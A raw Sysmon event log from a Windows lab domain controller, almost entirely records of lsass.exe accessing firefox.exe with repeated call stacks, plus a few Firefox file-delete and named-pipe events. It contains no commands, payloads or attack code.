Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000288152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\datareporting\glean\pending_pings\225d63b0-15f8-4510-8c21-3c053328e987MD5=116137F8F1CB8239BB8632BDA9296CA7,SHA256=7D5CB6C9C31C1D662281D6AAC07507E6F0570B1759FD136FC042E138CFEF3FD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000288151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288150Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288149Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.315{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288138Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288137Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288136Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000288135Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.300{C8EA50B7-F11D-6215-0B00-000000003802}6282128C:\Windows\system32\lsass.exe{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 17141700x8000000000000000288134Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.284{C8EA50B7-11AA-6216-1605-000000003802}2228\chrome.2228.9.17520500C:\Program Files\Mozilla Firefox\firefox.exe 18141800x8000000000000000288133Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-ConnectPipe2022-02-23 10:51:26.284{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-3C:\Program Files\Mozilla Firefox\firefox.exe 17141700x8000000000000000288132Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-CreatePipe2022-02-23 10:51:26.284{C8EA50B7-11AA-6216-1605-000000003802}2228\cubeb-pipe-2228-3C:\Program Files\Mozilla Firefox\firefox.exe 23542300x8000000000000000288131Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:26.281{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program 